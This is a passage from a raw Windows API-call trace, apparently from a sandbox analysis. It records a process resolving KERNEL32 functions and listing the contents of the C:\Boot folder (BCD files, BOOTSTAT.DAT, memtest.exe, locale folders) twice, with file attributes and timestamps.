pbstr=0x689f9d8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x689f9d8*="KERNEL32.DLL") returned 1 [0130.929] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0130.929] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0130.932] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0130.936] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0130.938] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0130.948] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f6ac) returned 1 [0130.948] GetFullPathNameW (in: lpFileName="C:\\Boot", nBufferLength=0x105, lpBuffer=0x689f1b4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot", lpFilePart=0x0) returned 0x7 [0130.948] GetFullPathNameW (in: lpFileName="C:\\Boot\\", nBufferLength=0x105, lpBuffer=0x689f188, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\", lpFilePart=0x0) returned 0x8 [0130.949] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x689f3d4 | out: lpFindFileData=0x689f3d4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77ab70 [0130.949] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0130.949] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x90cd45e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x90cd45e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0130.950] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x9098e7a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0130.950] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0130.950] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0130.950] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0130.950] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0130.950] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0130.951] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0130.951] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0130.951] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0130.951] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0130.951] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0130.952] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0130.952] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0130.952] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0130.952] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0130.953] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0130.953] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0130.953] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0130.953] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0130.953] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0130.953] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0130.954] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0130.954] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0130.954] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0130.954] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0130.955] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0130.955] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0130.955] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0130.955] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0130.955] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0130.955] FindClose (in: hFindFile=0x77ab70 | out: hFindFile=0x77ab70) returned 1 [0130.956] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f66c) returned 1 [0130.956] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f678) returned 1 [0130.956] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f6ac) returned 1 [0130.956] GetFullPathNameW (in: lpFileName="C:\\Boot", nBufferLength=0x105, lpBuffer=0x689f1b4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot", lpFilePart=0x0) returned 0x7 [0130.956] GetFullPathNameW (in: lpFileName="C:\\Boot\\", nBufferLength=0x105, lpBuffer=0x689f188, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\", lpFilePart=0x0) returned 0x8 [0130.956] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x689f3d4 | out: lpFindFileData=0x689f3d4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77ab70 [0130.956] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0130.957] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x90cd45e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x90cd45e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0130.957] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x9098e7a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0130.957] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0130.957] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0130.957] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0130.958] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0130.958] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0130.958] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0130.958] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0131.189] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x689f3e4 | out: lpFindFileData=0x689f3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, 